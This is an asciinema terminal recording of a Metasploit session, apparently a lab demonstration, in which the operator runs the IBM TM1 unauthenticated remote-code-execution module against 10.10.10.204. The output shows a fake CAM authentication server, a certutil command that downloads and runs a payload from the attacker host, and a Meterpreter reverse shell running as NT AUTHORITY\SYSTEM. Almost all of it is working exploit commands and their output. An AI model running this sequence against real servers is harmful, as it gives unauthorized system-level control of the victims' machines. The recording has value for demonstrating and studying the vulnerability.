{"version": 2, "width": 191, "height": 52, "timestamp": 1589009064, "env": {"SHELL": "/bin/bash", "TERM": "screen-256color"}}
[0.232009, "o", "\u001b[1m\u001b[38;5;11mmetasploit-framework\u001b[m\u000f\u001b[m\u000f\u001b[38;5;15m \u001b[1m\u001b[m\u000f\u001b[38;5;11m>\u001b[m\u000f\u001b[m\u000f\u001b[38;5;15m \u001b[m\u000f"]
[1.268647, "o", "."]
[1.415426, "o", "/"]
[1.587647, "o", "m"]
[1.688598, "o", "s"]
[1.76041, "o", "f"]
[1.917376, "o", "c"]
[1.998448, "o", "o"]
[2.094895, "o", "nsole "]
[2.44351, "o", "\r\n"]
[9.864058, "o", "[*] Starting the Metasploit Framework console.../\r"]
[9.965456, "o", "[*] Starting the Metasploit Framework console...-\r"]
[10.065601, "o", "[*] Starting the Metasploit Framework console...\\\r"]
[10.167319, "o", "[*] starting the Metasploit Framework console...|\r"]
[10.367537, "o", "[*] STarting the Metasploit Framework console.../\r"]
[10.52768, "o", "[*] StArting the Metasploit Framework console...-\r"]
[10.727946, "o", "[*] StaRting the Metasploit Framework console...\\\r"]
[10.928181, "o", "[*] StarTing the Metasploit Framework console...|\r"]
[11.028315, "o", "[*] StartIng the Metasploit Framework console.../\r"]
[11.12906, "o", "[*] StartiNg the Metasploit Framework console...-\r"]
[11.229231, "o", "[*] StartinG the Metasploit Framework console...\\\r"]
[11.348923, "o", "[*] Starting the Metasploit Framework console...|\r"]
[11.449109, "o", "[*] Starting The Metasploit Framework console.../\r"]
[11.550354, "o", "[*] Starting tHe Metasploit Framework console...-\r"]
[11.668556, "o", "[*] Starting thE Metasploit Framework console...\\\r"]
[11.769226, "o", "[*] Starting the Metasploit Framework console...|\r"]
[11.870634, "o", "[*] Starting the metasploit Framework console.../\r"]
[11.992605, "o", "[*] Starting the MEtasploit Framework console...-\r"]
[12.093368, "o", "[*] Starting the MeTasploit Framework console...\\\r"]
[12.193609, "o", "[*] Starting the MetAsploit Framework console...|\r"]
[12.294142, "o", "[*] Starting the MetaSploit Framework console.../\r"]
[12.395636, "o", "[*] Starting the MetasPloit Framework console...-\r"]
[12.497164, "o", "[*] Starting the MetaspLoit Framework console...\\\r"]
[12.597332, "o", "[*] Starting the MetasplOit Framework console...|\r"]
[12.705134, "o", "[*] Starting the MetasploIt Framework console.../\r"]
[12.817357, "o", "[*] Starting the MetasploiT Framework console...-\r"]
[12.924363, "o", "[*] Starting the Metasploit Framework console...\\\r"]
[13.026195, "o", "[*] Starting the Metasploit framework console...|\r"]
[13.128144, "o", "[*] Starting the Metasploit FRamework console.../\r"]
[13.228347, "o", "[*] Starting the Metasploit FrAmework console...-\r"]
[13.328541, "o", "[*] Starting the Metasploit FraMework console...\\\r"]
[13.436811, "o", "[*] Starting the Metasploit FramEwork console...|\r"]
[13.53709, "o", "[*] Starting the Metasploit FrameWork console.../\r"]
[13.642122, "o", "[*] Starting the Metasploit FramewOrk console...-\r"]
[13.742286, "o", "[*] Starting the Metasploit FramewoRk console...\\\r"]
[13.842582, "o", "[*] Starting the Metasploit FrameworK console...|\r"]
[13.942715, "o", "[*] Starting the Metasploit Framework console.../\r"]
[14.042877, "o", "[*] Starting the Metasploit Framework Console...-\r"]
[14.118216, "o", "\r                                                  \r\n"]
[14.118518, "o", "\u001b[0m"]
[14.119409, "o", "\u001b[36m\u001b[37mCall trans opt: received. 2-19-98 13:24:18 REC:Loc\r\n\r\n     Trace program: running\r\n\r\n           wake up, Neo...\r\n        \u001b[1mthe matrix has you\u001b[0m\r\n      follow the white rabbit.\r\n\r\n          knock, knock, Neo.\r\n\r\n                        (`.         ,-,\r\n                        ` `.    ,;' /\r\n                         `.  ,'/ .'\r\n                          `. X /.'\r\n                .-;--''--.._` ` (\r\n              .'            /   `\r\n             ,           ` '   Q '\r\n             ,         ,   `._    \\\r\n          ,.|         '     `-.;_'\r\n          :  . `  ;    `  ` --,.._;\r\n           ' `    ,   )   .'\r\n              `._ ,  '   /_\r\n                 ; ,''-,;' ``-\r\n                  ``-..__``--`\r\n\r\n                             https://metasploit.com\u001b[0m\r\n\u001b[0m\r\n\r\n       =[ \u001b[33mmetasploit v5.0.86-dev-227347627c\u001b[0m               ]\r\n+ -- --=[ 2004 exploits - 1095 auxiliary - 342 post       ]\r\n+ -- --=[ 564 payloads - 45 encoders - 10 nops            ]\r\n+ -- --=[ 7 evasion                             "]
[14.119482, "o", "          ]\r\n\r\nMetasploit tip: View all productivity tips with the \u001b[32mtips\u001b[0m command\r\n\r\n"]
[14.119674, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Starting persistent handler(s)...\r\n"]
[14.210796, "o", "\u001b[4mmsf5\u001b[0m \u001b[0m> "]
[15.087258, "o", "\r"]
[15.087397, "o", "(reverse-i-search)`': "]
[15.439944, "o", "\b\b\bu': run\b\b"]
[15.526515, "o", "\b\b\b\bs': use exploit/multi/misc/ibm_tm1_unauth_rce \r"]
[15.526642, "o", "\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C"]
[15.57214, "o", "\b\b\b"]
[15.57226, "o", "e': use exploit/multi/misc/ibm_tm1_unauth_rce \r\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C"]
[16.276351, "o", "\r"]
[16.276486, "o", "\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[4mmsf5\u001b[0m \u001b[0m>"]
[16.276745, "o", "\r\u001b[4mmsf5\u001b[0m \u001b[0m> \r\r\n"]
[16.283908, "o", "\u001b[0m"]
[16.31592, "o", "\u001b[4mmsf5\u001b[0m exploit(\u001b[1m\u001b[31mmulti/misc/ibm_tm1_unauth_rce\u001b[0m) \u001b[0m> "]
[16.970027, "o", "\r\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P(reverse-i-search)`':"]
[16.970101, "o", "\u001b[C"]
[17.156628, "o", "\b\b\br': use exploit/multi/misc/ibm_tm1_unauth_rce "]
[17.156743, "o", "\b\b\b\b"]
[17.258997, "o", "\r\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C"]
[17.259115, "o", "\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[Ph': set rhost 10.10.10.204\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b"]
[17.992577, "o", "\r\u001b[4mmsf5\u001b[0m exploit(\u001b[1m\u001b[31mmulti/misc/ibm_tm1_unauth_rce\u001b[0m) \u001b[0m> set rhost 10.10.10.204"]
[17.992702, "o", "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b"]
[17.992748, "o", "\r\r\n"]
[17.99666, "o", "\u001b[0m"]
[17.996932, "o", "rhost => 10.10.10.204\r\n"]
[18.010315, "o", "\u001b[4mmsf5\u001b[0m exploit(\u001b[1m\u001b[31mmulti/misc/ibm_tm1_unauth_rce\u001b[0m) \u001b[0m> "]
[19.017919, "o", "\r\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P(reverse-i-search)`':\u001b[C"]
[19.249784, "o", "\b\b\b"]
[19.249833, "o", "l': use exploit/multi/misc/ibm_tm1_unauth_rce "]
[19.249956, "o", "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b"]
[19.472936, "o", "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[Ph': set lhost 10.10.10.1\b\b\b\b\b\b\b\b\b\b\b\b\b\b"]
[20.001779, "o", "\r"]
[20.001891, "o", "\u001b[4mmsf5\u001b[0m exploit(\u001b[1m\u001b[31mmulti/misc/ibm_tm1_unauth_rce\u001b[0m) \u001b[0m> set lhost 10.10.10.1\b\b\b\b\b\b\b\b\b\b\b\b\b\b"]
[20.002144, "o", "\r\r\n"]
[20.005641, "o", "\u001b[0m"]
[20.005906, "o", "lhost => 10.10.10.1\r\n"]
[20.019362, "o", "\u001b[4mmsf5\u001b[0m exploit(\u001b[1m\u001b[31mmulti/misc/ibm_tm1_unauth_rce\u001b[0m) \u001b[0m> "]
[20.488542, "o", "\r"]
[20.488612, "o", "\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P(reverse-i-search)`':\u001b[C"]
[20.73011, "o", "\b\b\bs': set lhost 10.10.10.1\b\b\b\b\b\b\b\b\b\b\b"]
[20.82632, "o", "\b\b\b\b\b\b\b\b\b\br': set srvhost 10.10.10.1\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b"]
[21.596791, "o", "\r\u001b[4mmsf5\u001b[0m exploit(\u001b[1m\u001b[31mmulti/misc/ibm_tm1_unauth_rce\u001b[0m) \u001b[0m> set srvhost 10.10.10.1"]
[21.596914, "o", "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b"]
[21.597127, "o", "\r\r\n"]
[21.600927, "o", "\u001b[0m"]
[21.601248, "o", "srvhost => 10.10.10.1\r\n"]
[21.614474, "o", "\u001b[4mmsf5\u001b[0m exploit(\u001b[1m\u001b[31mmulti/misc/ibm_tm1_unauth_rce\u001b[0m) \u001b[0m> "]
[24.728688, "o", "r"]
[24.808084, "o", "u"]
[24.997861, "o", "n"]
[25.437309, "o", "\r\r\n"]
[25.445687, "o", "\u001b[0m"]
[26.703115, "o", "\r\n"]
[26.703295, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Started reverse TCP handler on 10.10.10.1:4444 \r\n"]
[26.711257, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 10.10.10.204:5498 - Connecting to admin server and obtaining application data\r\n"]
[26.913718, "o", "\u001b[1m\u001b[32m[+]\u001b[0m 10.10.10.204:5498 - Found app 24retail tcp ip: 10.10.10.204 port: 17414 available: 1 SSL: 0\r\n"]
[26.914274, "o", "\u001b[1m\u001b[32m[+]\u001b[0m 10.10.10.204:5498 - Found app GO_New_Stores tcp ip: 10.10.10.204 port: 45557 available: 1 SSL: 1\r\n"]
[26.914684, "o", "\u001b[1m\u001b[32m[+]\u001b[0m 10.10.10.204:5498 - Found app GO_Scorecards tcp ip: 10.10.10.204 port: 44321 available: 1 SSL: 1\r\n"]
[26.915479, "o", "\u001b[1m\u001b[32m[+]\u001b[0m 10.10.10.204:5498 - Found app Planning Sample tcp ip: 10.10.10.204 port: 12345 available: 1 SSL: 1\r\n"]
[26.916193, "o", "\u001b[1m\u001b[32m[+]\u001b[0m 10.10.10.204:5498 - Found app proven_techniques tcp ip: 10.10.10.204 port: 53333 available: 1 SSL: 1\r\n\u001b[1m\u001b[32m[+]\u001b[0m 10.10.10.204:5498 - Found app SData tcp ip: 10.10.10.204 port: 12346 available: 1 SSL: 1\r\n"]
[26.917464, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 10.10.10.204:5498 - Picked SData as our target, connecting...\r\n"]
[27.148591, "o", "\u001b[1m\u001b[32m[+]\u001b[0m 10.10.10.204:5498 - Current auth method is 1, we're good to go!\r\n"]
[27.294166, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 10.10.10.204:5498 - Starting up the fake CAM server...\r\n"]
[27.295132, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 10.10.10.204:5498 - Using URL: http://10.10.10.1:8080/\r\n"]
[27.296346, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 10.10.10.204:5498 - Changing authentication method to 4 (CAM auth)\r\n"]
[27.305937, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 10.10.10.204:5498 - Authenticating using CAM Passport and our fake CAM Service...\r\n"]
[27.322357, "o", "\u001b[1m\u001b[32m[+]\u001b[0m 10.10.10.204:5498 - CAM: Received first CAM query, responding with account info\r\n"]
[27.324661, "o", "\u001b[1m\u001b[32m[+]\u001b[0m 10.10.10.204:5498 - CAM: Received second CAM query, responding with session info\r\n"]
[27.328084, "o", "\u001b[1m\u001b[32m[+]\u001b[0m 10.10.10.204:5498 - CAM: Received third CAM query, responding with random garbage\r\n"]
[27.921598, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 10.10.10.204:5498 - Creating our Process object...\r\n"]
[28.122302, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 10.10.10.204:5498 - Adding command: \"certutil.exe -urlcache -split -f http://10.10.10.1:8080/ C:\\Windows\\Temp\\QEeiEne.exe\" to the Process object...\r\n"]
[28.122497, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 10.10.10.204:5498 - Adding command: \"C:\\Windows\\Temp\\QEeiEne.exe\" to the Process object...\r\n"]
[28.323182, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 10.10.10.204:5498 - Registering the Process object under the name 'uxhzsjhX'\r\n"]
[28.523919, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 10.10.10.204:5498 - Now let's execute the Process object!\r\n"]
[28.524378, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 10.10.10.204:5498 - Restoring original authentication method 1\r\n"]
[28.560627, "o", "\u001b[1m\u001b[32m[+]\u001b[0m 10.10.10.204:5498 - CAM: Received request for payload executable, shell incoming!\r\n"]
[28.767987, "o", "\u001b[1m\u001b[32m[+]\u001b[0m 10.10.10.204:5498 - CAM: Received request for payload executable, shell incoming!\r\n"]
[28.818695, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Sending stage (180291 bytes) to 10.10.10.204\r\n"]
[29.025814, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Meterpreter session 1 opened (10.10.10.1:4444 -> 10.10.10.204:49417) at 2020-05-09 14:24:53 +0700\r\n"]
[29.028688, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 10.10.10.204:5498 - Server stopped.\r\n"]
[29.029269, "o", "\u001b[1m\u001b[33m[!]\u001b[0m 10.10.10.204:5498 - This exploit may require manual cleanup of 'C:\\Windows\\Temp\\QEeiEne.exe' on the target\r\n"]
[29.029454, "o", "\r\n"]
[29.029634, "o", "\u001b[0m"]
[29.050125, "o", "\u001b[4mmeterpreter\u001b[0m > "]
[29.265709, "o", "\u001b[0m"]
[29.8443, "o", "\u001b[0m"]
[31.100534, "o", "s"]
[31.164677, "o", "h"]
[31.331139, "o", "e"]
[31.451589, "o", "l"]
[31.565612, "o", "l"]
[31.930021, "o", "\r\r\n"]
[31.939177, "o", "\u001b[0m"]
[32.063159, "o", "Process 3108 created.\r\n"]
[32.063842, "o", "Channel 2 created.\r\n"]
[32.125356, "o", "Microsoft Windows [Version 6.3.9600]\r\r\n(c) 2013 Microsoft Corporation. All rights reserved.\r\r\n\r\r\nc:\\program files\\ibm\\cognos\\tm1_64\\samples\\tm1\\sdata>"]
[33.024268, "o", "w"]
[33.104889, "o", "h"]
[33.2685, "o", "o"]
[33.69115, "o", "a"]
[33.796242, "o", "m"]
[33.952519, "o", "i"]
[34.469978, "o", "\r\n"]
[34.594007, "o", "whoami\r\nnt authority\\system\r\r\n\r\r\nc:\\program files\\ibm\\cognos\\tm1_64\\samples\\tm1\\sdata>"]
[35.765164, "o", "P"]
[35.88346, "o", "W"]
[36.256377, "o", "N"]
[36.32646, "o", "E"]
[36.428483, "o", "D"]
[36.608637, "o", "!"]
[36.750763, "o", "!"]
[36.900994, "o", "!"]
[37.281547, "o", "\r\n"]
[37.406445, "o", "PWNED!!!\r\n'PWNED!!!' is not recognized as an internal or external command,\r\r\noperable program or batch file.\r\r\n\r\r\nc:\\program files\\ibm\\cognos\\tm1_64\\samples\\tm1\\sdata>"]
[39.222689, "o", "e"]
[39.519909, "o", "x"]
[39.648384, "o", "i"]
[39.757288, "o", "t"]
[39.872815, "o", "\r\n"]
[39.922679, "o", "exit\r\n"]
[40.135694, "o", "\u001b[4mmeterpreter\u001b[0m > "]
[40.570448, "o", "e"]
[40.714056, "o", "x"]
[40.794272, "o", "i"]
[40.910545, "o", "t"]
[41.014756, "o", "\r"]
[41.014895, "o", "\r\n"]
[41.024246, "o", "\u001b[0m"]
[41.02474, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Shutting down Meterpreter...\r\n"]
[41.025383, "o", "\r\n"]
[41.026256, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 10.10.10.204 - Meterpreter session 1 closed.  Reason: User exit\r\n"]
[41.04736, "o", "\u001b[4mmsf5\u001b[0m exploit(\u001b[1m\u001b[31mmulti/misc/ibm_tm1_unauth_rce\u001b[0m) \u001b[0m> "]
[41.44043, "o", "e"]
[41.597052, "o", "x"]
[41.691357, "o", "i"]
[41.803711, "o", "t"]
[41.914929, "o", "\r\r\n"]
[41.924302, "o", "\u001b[0m"]
[41.962736, "o", "\u001b[1m\u001b[38;5;11mmetasploit-framework\u001b[m\u000f\u001b[m\u000f\u001b[38;5;15m \u001b[1m\u001b[m\u000f\u001b[38;5;11m>\u001b[m\u000f\u001b[m\u000f\u001b[38;5;15m \u001b[m\u000f"]
[42.31265, "o", "e"]
[42.453779, "o", "x"]
[42.558042, "o", "i"]
[42.682471, "o", "t"]
[42.809856, "o", "\r\n"]
[42.809991, "o", "logout\r\n"]
[42.815896, "o", "\u001b[H\u001b[J"]
